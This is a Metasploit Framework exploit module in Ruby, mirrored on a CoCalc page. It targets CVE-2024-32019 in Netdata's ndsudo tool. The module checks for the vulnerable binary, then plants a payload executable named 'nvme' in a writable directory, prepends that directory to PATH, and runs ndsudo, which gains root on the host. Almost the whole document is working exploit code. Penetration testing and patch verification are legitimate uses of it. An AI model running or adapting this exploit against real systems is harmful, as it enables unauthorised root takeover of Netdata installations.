Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/linux/local/ndsudo_cve_2024_32019.rb
21089 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = NormalRanking

8


9
  include Msf::Post::Linux::Priv

10
  include Msf::Post::Linux::System

11
  include Msf::Post::Linux::Kernel

12
  include Msf::Exploit::EXE

13
  include Msf::Exploit::FileDropper

14
  prepend Msf::Exploit::Remote::AutoCheck

15


16
  def initialize(info = {})

17
    super(

18
      update_info(

19
        info,

20
        'Name' => 'Netdata ndsudo privilege escalation',

21
        'Description' => %q{

22
          The `ndsudo` is a tool shipped with Netdata Agent. The version v1.45.0 and below contain vulnerability, which allows an attacker to gain privilege escalation using `ndsudo` binary. The vulnerability is untrusted search path, when searching for additional binary files, such as `nvme`. An attacker can create malicious binary with same name and add the directory of this binary into `$PATH` variable. The `ndsudo` will trust the first occurence of this binary and execute it.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [

26
          'msutovsky-r7', # msf module

27
          'mia-0' # security researcher

28
        ],

29
        'Platform' => [ 'linux' ],

30
        'Arch' => [ ARCH_X86, ARCH_X64 ],

31
        'SessionTypes' => [ 'shell', 'meterpreter' ],

32
        'Targets' => [[ 'Auto', {} ]],

33
        'Privileged' => true,

34
        'References' => [

35
          [ 'URL', 'https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93'],

36
          [ 'CVE', '2024-32019']

37
        ],

38
        'DisclosureDate' => '2024-04-12',

39
        'DefaultTarget' => 0,

40
        'Notes' => {

41
          'Stability' => [CRASH_SAFE],

42
          'Reliability' => [REPEATABLE_SESSION],

43
          'SideEffects' => [IOC_IN_LOGS]

44
        }

45
      )

46
    )

47


48
    register_advanced_options [

49
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),

50
      OptString.new('NdsudoPath', [ true, 'A path to ndsudo binary on the target system', '/usr/libexec/netdata/plugins.d/ndsudo'])

51
    ]

52
  end

53


54
  def check

55
    # could not find reasonable way to get version

56
    return CheckCode::Safe('Vulnerable binary not detected, check NdsudoPath option') unless file?(datastore['NdsudoPath']) && executable?(datastore['NdsudoPath'])

57
    return CheckCode::Unknown('Failed to run vulnerable binary, either binary is not ndsudo or user does not have right to execute ndsudo') unless cmd_exec(datastore['NdsudoPath']) == 'at least 2 parameters are needed, but 1 were given.'

58


59
    CheckCode::Appears('Vulnerable binary detected')

60
  end

61


62
  def exploit

63
    base_dir = datastore['WritableDir']

64
    if !datastore['ForceExploit'] && is_root?

65
      fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override')

66
    end

67


68
    unless writable? base_dir

69
      fail_with(Failure::BadConfig, "#{base_dir} is not writable")

70
    end

71


72
    executable_path = "#{base_dir}/nvme"

73
    vprint_status("Creating malicious file at #{executable_path}")

74


75
    fail_with(Failure::PayloadFailed, 'Failed to upload malicious binary') unless upload_and_chmodx(executable_path, generate_payload_exe)

76


77
    register_files_for_cleanup(executable_path)

78


79
    vprint_status('Executing..')

80


81
    cmd_exec("PATH=#{base_dir}:$PATH '#{datastore['NdsudoPath']}' nvme-list")

82
  end

83
end

84


85